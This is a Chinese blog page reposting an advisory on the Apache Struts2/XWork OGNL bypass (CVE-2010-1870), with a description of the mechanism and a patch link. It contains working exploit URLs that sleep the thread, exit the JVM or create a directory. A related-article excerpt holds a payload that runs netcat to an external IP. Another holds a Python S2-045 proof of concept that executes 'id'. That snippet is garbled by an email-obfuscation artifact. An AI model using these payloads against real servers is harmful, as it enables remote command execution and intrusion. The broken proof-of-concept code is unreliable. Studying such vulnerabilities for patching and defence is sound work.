Apache Struts2 XWork绕过安全限制执行任意命令漏洞

最新推荐文章于 2022-01-12 15:38:18 发布
原创 最新推荐文章于 2022-01-12 15:38:18 发布 · 1.5k 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#java

文章详细介绍了Struts2框架中XWork存在的命令执行漏洞,包括漏洞原理、攻击方法和防范措施。提醒开发者及时更新补丁以修复此安全问题。

http://mydomain/MyStruts.action?('\43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('\43context[\'xwork.MethodAccessor.denyMethodExecution\']\75false')(b))&('\43c')(('\43_memberAccess.excludeProperties\75@java.util.Collections@EMPTY_SET')(c))&(d)(('@java.lang.Thread@sleep(60000)')(d))

 

线程休眠60s

 

 

http://www.nsfocus.net/vulndb/15431

发布日期:2010-07-09
更新日期:2010-07-15

受影响系统:

OpenSymphony XWork < 2.2.0
Apache Group Struts < 2.2.0

描述:

BUGTRAQ  ID: 41592
CVE ID: CVE-2010-1870

XWork是一个命令模式框架,用于支持Struts 2及其他应用。

XWork处理用户请求参数数据时存在漏洞,远程攻击者可以利用此漏洞在系统上执行任意命令。

Struts2中WebWork框架使用XWork基于HTTP参数名执行操作和调用,将每个HTTP参数名处理为OGNL(对象图形导航语言)语句,而OGNL将:  

user.address.city=Bishkek&user['favoriteDrink']=kumys  

转换为:  

action.getUser().getAddress().setCity("Bishkek")  
action.getUser().setFavoriteDrink("kumys")  

这是通过ParametersInterceptor来执行的,使用用户提供的HTTP参数调用ValueStack.setValue()。  

除了获取和设置属性外,OGNL还支持其他一些功能:  

    * 方法调用:foo()  
    * 静态方式调用: @java.lang.System@exit(1)  
    * 构建函数调用:new MyClass()  
    * 处理上下文变量:#foo = new MyClass()  

由于HTTP参数名为OGNL语句,为了防范攻击者通过HTTP参数调用任意方式,XWork使用了以下两个变量保护方式的执行:  

    * OgnlContext的属性xwork.MethodAccessor.denyMethodExecution(默认设置为true)  
    * SecurityMemberAccess私有字段allowStaticMethodAccess(默认设置为false)
  
为了方便开发人员访问各种常用的对象,XWork提供了一些预定义的上下文变量:  

    * #application  
    * #session  
    * #request  
    * #parameters  
    * #attr  
    * #context
    * #_memberAccess
    * #root  
    * #this  
    * #_typeResolver  
    * #_classResolver  
    * #_traceEvaluations  
    * #_lastEvaluation  
    * #_keepLastEvaluation  

这些变量代表各种服务器端对象。为了防范篡改服务器端对象,XWork的ParametersInterceptor不允许参数名中出现“#”字符,但如果使用了Java的unicode字符串表示\u0023,攻击者就可以绕过保护,修改保护Java方式执行的值:  

#_memberAccess['allowStaticMethodAccess'] = true  
#foo = new java .lang.Boolean("false")  
#context['xwork.MethodAccessor.denyMethodExecution'] = #foo  
#rt = @java.lang.Runtime@getRuntime()  
#rt.exec('mkdir /tmp/PWNED')

<*来源:Meder Kydyraliev (bugtraq@web.areopag.net
  
  链接:http://secunia.com/advisories/32495/
        http://www.exploit-db.com/exploits/14360/
*>

测试方法:

 

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

 

 

http://mydomain/MyStruts.action?('\u0023_memberAccess[\'allowStaticMethodAccess\']')(meh)=true&(aaa)(('\u0023context[\'xwork.MethodAccessor.denyMethodExecution\']\u003d\u0023foo')(\u0023foo\u003dnew%20java.lang.Boolean("false")))&(asdf)(('\u0023rt.exit(1)')(\u0023rt\u003d@java.lang.Runtime@getRuntime()))=1

建议:

厂商补丁:

Apache Group
------------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:

http://svn.apache.org/viewvc?view=revision&revision=956389

demon37
关注
【CVE-2024-53677】Apache Struts2 文件上传逻辑绕过
weixin_47075747的博客
12-23 442
Apache官方公告又更新了一个Struts2漏洞,考虑到很久没有发无密码的博客了,再加上漏洞的影响并不严重,因此公开分享利用的思路。
安全漏洞Struts2漏洞集合总结
HBohan的博客
01-24 3529
总结了一部分 Strtus2 漏洞,虽然现在这部分的漏洞很少了,但也是学习的一部分,收集的并不全面,后续会做补充。 漏洞环境搭建可以使用在线的 Vulfocus ,或者使用docker部署。
XWork绕过安全限制执行任意命令漏洞补丁
08-20
CVE ID: CVE-2010-1870 XWork是一个命令模式框架,用于支持Struts 2及其他应用。 XWork处理用户请求参数数据时存在漏洞,远程攻击者可以利用此漏洞在系统上执行任意命令Struts2中WebWork框架使用XWork基于HTTP参数名执行操作和调用,将每个HTTP参数名处理为OGNL(对象图形导航语言)语句,而OGNL将: user.address.city=Bishkek&user['favoriteDrink']=kumys 转换为: action.getUser().getAddress().setCity("Bishkek") action.getUser().setFavoriteDrink("kumys") 这是通过ParametersInterceptor来执行的,使用用户提供的HTTP参数调用ValueStack.setValue()。 除了获取和设置属性外,OGNL还支持其他一些功能: * 方法调用:foo() * 静态方式调用: @java.lang.System@exit(1) * 构建函数调用:new MyClass() * 处理上下文变量:#foo = new MyClass() 由于HTTP参数名为OGNL语句,为了防范攻击者通过HTTP参数调用任意方式,XWork使用了以下两个变量保护方式的执行: * OgnlContext的属性xwork.MethodAccessor.denyMethodExecution(默认设置为true) * SecurityMemberAccess私有字段allowStaticMethodAccess(默认设置为false) 为了方便开发人员访问各种常用的对象,XWork提供了一些预定义的上下文变量: * #application * #session * #request * #parameters * #attr * #context * #_memberAccess * #root * #this * #_typeResolver * #_classResolver * #_traceEvaluations * #_lastEvaluation * #_keepLastEvaluation 这些变量代表各种服务器端对象。为了防范篡改服务器端对象,XWork的ParametersInterceptor不允许参数名中出现“#”字符,但如果使用了Java的unicode字符串表示\u0023,攻击者就可以绕过保护,修改保护Java方式执行的值: #_memberAccess['allowStaticMethodAccess'] = true #foo = new java .lang.Boolean("false") #context['xwork.MethodAccessor.denyMethodExecution'] = #foo #rt = @java.lang.Runtime@getRuntime() #rt.exec('mkdir /tmp/PWNED')
struts2+xwork源代码部署
12-11
struts2+xwork的源代码调试项目,包含简单的demo项目。次项目可直接导入eclispe、部署在服务器上要加入servlet-api.jar包的支持,此项目为研究源代码者提供,这也是个人好长时间自己探索出来的,希望大家努力。struts+xwork版本是2.43的,已经经过编译的绝对不是工具反编译出来的。
ApacheStruts2框架严重安全漏洞
07-20
ApacheStruts2框架最近出了一个很严重的漏洞,可以直接执行系统命令 http://www.163.com?%28%27\u0023_memberAccess[\%27allowStaticMethodAccess\%27]%27%29%28meh%29=true&%28aaa%29%28%28%27\u0023context[\%27xwork.MethodAccessor.denyMethodExecution\%27]\u003d\u0023foo%27%29%28\u0023foo\u003dnew%20java.lang.Boolean%28%22false%22%29%29%29&%28asdf%29%28%28%27\u0023rt.exec%28%22/usr/bin/nc%2067.205.52.169%208888%22%29%27%29%28\u0023rt\u003d@java.lang.Runtime@getRuntime%28%29%29%29=1
Struts2安全漏洞(转载绿盟)
iteye_18492的博客
07-19 288
XWork ParameterInterceptor类绕过安全限制漏洞 受影响系统: OpenSymphony XWork &lt; 2.2.0Apache Group Struts &lt; 2.2.0 描述: CVE ID: CVE-2010-1870XWork是一个命令模式框架,用于支持Struts 2及其他应用。 Struts2中WebWork框架使用XWork基于HTTP参数名...
XWork ParameterInterceptor类绕过安全限制漏洞-解决1
weixin_33709219的博客
07-19 183
这个问题是如何发生的呢?下面深入看看: ? Struts2官方站点提供的Struts 2 的整体结构   一个请求在Struts2框架中的处理大概分为以下几个步骤: Struts2框架的调用流程: 1、当Servlet容器接收到一个请求后,将请求交给你在web.xml中配置的过滤器FilterDispatcher,调...
Struts2和Webwork远程命令执行漏洞分析1
08-08
漏洞被公开后,研究人员发现了绕过默认安全配置的方法,即通过OGNL语句覆盖Struts2和Webwork运行时的某些默认设置,使得静态方法执行得以恢复。攻击者可以构造特定的OGNL表达式,执行任意系统命令,对服务器造成...
Apache Struts2远程代码执行漏洞(S2-009)复现
qq_36933272的博客
09-05 1248
漏洞原理:ognl提供了广泛的表达式评估功能等功能。该漏洞允许恶意用户绕过parametersinterceptor内置的所有保护(正则表达式,拒绝方法调用),从而能够将任何暴露的字符串变量中的恶意表达式注入进行进一步评估。parametersinterceptor中的正则表达式将top [‘foo’](0)作为有效的表达式匹配,ognl将其作为(top [‘foo’])(0)处理,并将“foo”...
Apache Struts2 XWork绕过安全限制执行任意命令漏洞是否在Struts1中存在
大哲
08-12 554
Apache Struts2 XWork绕过安全限制执行任意命令漏洞 发布日期:2010-07-09更新日期:2010-07-15受影响系统: OpenSymphony XWork &lt; 2.2.0Apache Group Struts &lt; 2.2.0 描述: BUGTRAQ ID: 41592CVE ID: CVE-2010-1870    有哪位大侠知...
struts2绕过waf读写文件及另类方式执行命令1
08-03
但是执命令会发现直接 Connection Reset ,很明显是被 waf 拦截了0x01 背景0x02 探究 waf 规则个个删除关键字,发现拦截的关键字有
XWork ParameterInterceptor类绕过安全限制漏洞-解决2
weixin_33937499的博客
07-19 248
OK,问题找到了,其实这个问题,在2008年有类似描述:http://www.hacker.cn/News/ldgg/2008-11-7/08117107B0EE.shtml ActionContext ac = invocation.getInvocationContext(); Map parameters = ac.getParameters(); 事实上,随着项目应用的广泛,参数的多...
Struts2/XWork < 2.2.0远程执行任意代码漏洞分析及修补
JAVA
07-27 371
1.exploit-db网站在7月14日爆出了一个Struts2的远程执行任意代码的漏洞,此漏洞危害之大,可谓百发百中,直接root,只要采用了Struts2和webwork框架的系统(对于webwork的版本,不太清楚,我这里没环境对其一一测试,这里有两者关系的介绍),基本上无一幸免。 2.昨天在接到朋友的提醒后,迅速将公司的一些使用此框架开发的项目漏洞修补了,我想大部分大公司的也在第一时...
struts2/xwork漏洞
06-12 209
介绍struts2/xwork的Remote Command Execution Vulnerability漏洞,剖析了原因并供给了处理方法,能够拜见http://my-corner.iteye.com/blog/720209 去struts官网逛了一下,发现第一种处理方法晋级到struts2.2版别(当时的最新版),最终仍是没有彻底处理该疑问。当前,需求处理该疑问需求更新至2.3.1.2
Struts2/XWork 安全漏洞及解决办法
个人积累
08-11 2313
<br />exploit-db网站在7月14日爆出了一个Struts2的远程执行任意代码的漏洞。 <br />漏洞名称:Struts2/XWork < 2.2.0 Remote Command Execution Vulnerability <br />相关介绍: http://www.exploit-db.com/exploits/14360/ http://sebug.net/exploit/19954/ <br /><br />Struts2的核心是使用的webwork框架,处理 action时通过
关于Apache Struts2远程执行任意命令漏洞的紧急通报
weixin_30865427的博客
09-07 214
近期发生了多起黑客利用Apache Tomcat Struts2中间件的漏洞对用户网站进行攻击并篡改页面的事件,被利用的漏洞包括XWork ParameterInterceptors bypass allows remote command execution和ParameterInterceptor vulnerability allows remote command execution等...
深入struts2 (一)---Xwork介绍
夜深人静后的码农
05-28 8109
1      基本知识 由于struts2是在webwrok的技术基础上开发的,采用拦截器的机制来处理用户请求的全新MVC框架。而webwork是建立在成为xwork的command模式框架之上的强大的基于web的MVC框架。所以总而言之,无论是struts2还是webwork底层都是xwork。如果看过struts源码的朋友肯定会发现struts中导入好多xwork2类。下面就xwork做一个
墨者Apache Struts2远程代码执行漏洞(S2-005)复现题解
zr1213159840的博客
01-12 621
这题本来想自己手动来解决,不使用工具,奈何网上找的poc都没法用,然后我就想用工具然后wireshark抓包后重放不就行了,结果还是失败了,如果有哪位同学弄好了,希望能评论下,poc该如何使。 使用了wiresharke抓包后能看到红色中间部分的post数据包,但是放到bp中又不行,待我后面来研究下。 直接上工具: 直接拿到key了。 工具可以在这里下载: http://k8gege.org/p/ab3e87f7.html 不保证安全性,虽然我自己用了。 ...
给我简单直观的说一下命令执行漏洞和struct2远程命令执行漏洞
最新发布
04-03
### 命令执行漏洞概述 命令执行漏洞是指攻击者能够通过某种方式向目标系统注入并运行任意操作系统命令的一类安全漏洞。这类漏洞通常发生在应用程序未对用户输入进行严格校验的情况下,使得恶意用户可以利用特定的语法结构绕过验证机制,最终实现非法操作系统的指令。 对于Web应用而言,常见的命令执行漏洞场景包括但不限于文件上传、动态参数解析以及外部接口调用等功能模块[^1]。 --- ### Struts2 远程命令执行漏洞基本概念及原理 #### 1. **Struts2 框架简介** Apache Struts2 是一种流行的Java Web开发框架,它提供了丰富的功能支持开发者构建复杂的交互式网站。然而,由于其设计复杂度较高,在某些情况下可能存在安全隐患,其中最典型的便是远程命令执行漏洞。 #### 2. **S2-045 (CVE-2017-5638) 漏洞分析** 此漏洞存在于使用 Jakarta 插件处理文件上传的过程中。当程序接收到 HTTP 请求时,如果 Content-Type 参数未经充分过滤,则可能允许攻击者构造特殊的 Payload 来触发 OGNL 表达式的求值行为,从而达到执行任意命令的目的[^2]。 具体来说,问题根源在于默认使用的 Multipart 解析器——`jakarta` 实现部分未能有效隔离用户可控数据与内部逻辑表达式之间的边界关系,致使后者可被前者污染而引发进一步危害[^4]。 #### 3. **技术细节说明** 以下是该类型缺陷的核心工作机制描述: - 攻击面定位:主要集中在服务器端接收客户端提交的数据包环节; - 利用条件判断:需满足版本范围内的受影响组件部署现状; - 执行流程追踪:从初始请求到达直至最终完成恶意脚本加载全过程记录; 例如下面给出了一段模拟测试环境下的 Python 脚本用于演示如何发送带有危险负载的消息给受害主机尝试获取反弹 shell连接效果展示[^3]: ```python import requests url = 'http://example.com/upload' payload = { 'Content-Type': '''%{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='id').(#iswin=(@[email protected](\"Windows\")).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}''' } response = requests.post(url, headers=payload) print(response.text) ``` 上述代码片段展示了如何构造一个精心设计的内容类型字段以嵌入恶意OGNL语句,并试图让远端机器返回当前用户的标识信息作为响应的一部分。 --- ### 总结 综上所述,Struts2 的远程命令执行漏洞主要是因为不当的安全策略设置加上缺乏必要的输入净化措施所引起的重大风险事件之一。通过对这些案例的研究学习可以帮助我们更好地理解软件安全性的重要性及其防护手段的应用价值所在。 ---
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值